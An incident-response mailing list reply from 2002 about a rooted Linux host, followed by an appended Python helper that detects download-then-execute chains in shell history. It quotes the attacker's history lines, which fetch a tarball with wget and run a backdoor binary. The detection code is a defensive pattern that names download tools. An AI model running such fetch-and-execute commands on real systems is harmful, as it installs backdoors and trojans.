Security Incidents mailing list archives

Re: Rooted, .haos on system


From: zeno <bugtraq () cgisecurity net>
Date: Mon, 16 Dec 2002 15:54:02 -0500 (EST)

Left in the .bash_history was this:

        w
        cd /tmp
        wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
        ./epc

A quick check tells me that 'epc' is a backdoor utility, and the other
file contained within loc.tgz looks like a trojaned 'su'.


Maybe you should email this dude. He wrote the exploit (or so the exploit says):

"su exploit by XP <xp () xtreme-power com>
Enjoy!
"

Other neat stuff if you do a strings on the two filenames.





I've already notified Geocities abuse, and haven't heard back from them
yet.

The domain name resolves to http://www.djteckh.com/ maybe worth checking out.
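A small triage helper for a box like this, added here as an example and not part of the original post or thread: it walks a .bash_history for download-then-execute chains like the one above, pulls the hosts out of the fetched URLs for the abuse report, and does a `strings`-style extraction on a binary. The history text is constructed from the lines quoted above; the fetch command list, the three-command window and the binary bytes in the test are my own assumptions, not anything recovered from the compromised host.

```python
import re

# Constructed sample: the .bash_history lines quoted in the post, padded with
# two ordinary commands so the heuristic has benign input to ignore.
SAMPLE_HISTORY = """\
ls -la
w
cd /tmp
wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
./epc
exit
"""

FETCH_CMDS = {"wget", "curl", "ftp", "lynx", "fetch"}  # assumed download tools
URL_RE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/\S*)?", re.I)


def split_commands(line):
    """Split one history line on ;, &&, || and | into simple commands."""
    return [c.strip() for c in re.split(r"\s*(?:;|&&|\|\||\|)\s*", line) if c.strip()]


def triage_history(text, window=3):
    """Flag fetch-then-execute chains: a download command followed within
    `window` simple commands by running a relative binary (./name).
    Returns (urls, chains); each chain is a (url, binary) pair."""
    cmds = [c for line in text.splitlines() for c in split_commands(line)]
    urls, chains = [], []
    last_fetch = None  # (index, url) of the most recent download
    for i, cmd in enumerate(cmds):
        tok = cmd.split()
        if tok[0] in FETCH_CMDS:
            url = next((t for t in tok[1:] if URL_RE.fullmatch(t)), tok[-1])
            urls.append(url)
            last_fetch = (i, url)
        elif tok[0].startswith("./") and last_fetch and i - last_fetch[0] <= window:
            chains.append((last_fetch[1], tok[0][2:]))
    return urls, chains


def fetch_hosts(urls):
    """Bare hostnames from the fetched URLs, deduplicated, for the abuse report."""
    hosts = []
    for u in urls:
        h = re.sub(r"^https?://", "", u, flags=re.I).split("/")[0]
        if h not in hosts:
            hosts.append(h)
    return hosts


def printable_strings(data, minlen=4):
    """Pure-Python stand-in for `strings`: runs of printable ASCII >= minlen."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % minlen, data)
```

Run `triage_history(open(path).read())` against a copied-off history file; the window keeps an unrelated `./configure` hours later from being paired with an old download.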




 
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com